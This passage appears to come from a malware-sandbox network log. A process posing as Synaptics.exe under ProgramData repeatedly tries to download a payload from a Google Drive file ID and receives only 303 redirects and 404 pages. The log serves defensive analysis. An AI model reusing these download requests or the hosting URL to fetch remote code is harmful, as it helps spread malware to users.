                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-aCYMD7DYRR3xlkxlFRwy-Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                58192.168.2.449988142.250.181.144434076C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-24 17:21:23 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Cookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                                                                                                                2024-12-24 17:21:24 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:21:23 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-5kJECYbUYYAU2W7fxvjcYA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                59192.168.2.449987142.250.181.974434076C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-24 17:21:23 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Host: drive.usercontent.google.com
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Cookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                                                                                                                2024-12-24 17:21:24 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                X-GUploader-UploadID: AFiumC6zArIPqR8AdfXNuj4FoeAJqYC8o9qDzpLxjFKUr57gB8NfDKFh_274s4E1hJivsfBB
                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:21:24 GMT
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-SNK-inYMPfjvOUB9ZgUvDQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Content-Length: 1652
                                                                                                                                Server: UploadServer
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                                Connection: close
                                                                                                                                2024-12-24 17:21:24 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                2024-12-24 17:21:24 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 43 5f 6e 4a 71 53 75 61 35 76 53 36 49 30 74 38 43 5a 72 42 45 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                Data Ascii: t Found)!!1</title><style nonce="C_nJqSua5vS6I0t8CZrBEw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                2024-12-24 17:21:24 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                60192.168.2.449985142.250.181.144434076C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-24 17:21:23 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Cookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                                                                                                                2024-12-24 17:21:24 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:21:23 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-X2zV4vENE5s9ehu2YcIWDg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                61192.168.2.449986142.250.181.974434076C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-24 17:21:23 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Host: drive.usercontent.google.com
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Cookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                                                                                                                2024-12-24 17:21:24 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                X-GUploader-UploadID: AFiumC6Kdf3d_5lKbaiD3Hfp8rG6wdgEckqqWwYqjaWLajKjTBTEmSgx7kZfhPgz0GPViLI1
                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:21:23 GMT
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-vgz8ewODxkqPimc7RXSEVQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Content-Length: 1652
                                                                                                                                Server: UploadServer
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                                Connection: close
                                                                                                                                2024-12-24 17:21:24 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                2024-12-24 17:21:24 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4b 70 4a 6f 4d 31 74 70 34 41 64 4b 36 57 66 7a 70 4e 38 46 77 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                Data Ascii: t Found)!!1</title><style nonce="KpJoM1tp4AdK6WfzpN8FwA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                2024-12-24 17:21:24 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                62192.168.2.450005142.250.181.144434076C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-24 17:21:26 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Cookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                                                                                                                2024-12-24 17:21:27 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:21:26 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-3phhDky1BZHN0CKUt2B6Tg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                63192.168.2.450004142.250.181.144434076C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-24 17:21:26 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Cookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                                                                                                                2024-12-24 17:21:27 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:21:26 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-rLHtfze-kUtqiDsp_aBmAg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                64192.168.2.450013142.250.181.974434076C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-24 17:21:28 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Host: drive.usercontent.google.com
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Cookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                                                                                                                2024-12-24 17:21:29 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                X-GUploader-UploadID: AFiumC6qSj2R3Qscump2cF7Et3HSLkhWEGnCGgPBQPjGSSXY_JxKVPWZChf3hpdkKzfBCsqyKtCUgoc
                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:21:29 GMT
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-rIPq8ZrIn5_v-W2yvdGjRw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Content-Length: 1652
                                                                                                                                Server: UploadServer
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                                Connection: close
                                                                                                                                2024-12-24 17:21:29 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                2024-12-24 17:21:29 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 75 69 63 42 37 62 5a 52 59 47 4c 34 41 58 6b 41 49 4d 66 2d 69 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                Data Ascii: 404 (Not Found)!!1</title><style nonce="uicB7bZRYGL4AXkAIMf-iQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                2024-12-24 17:21:29 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
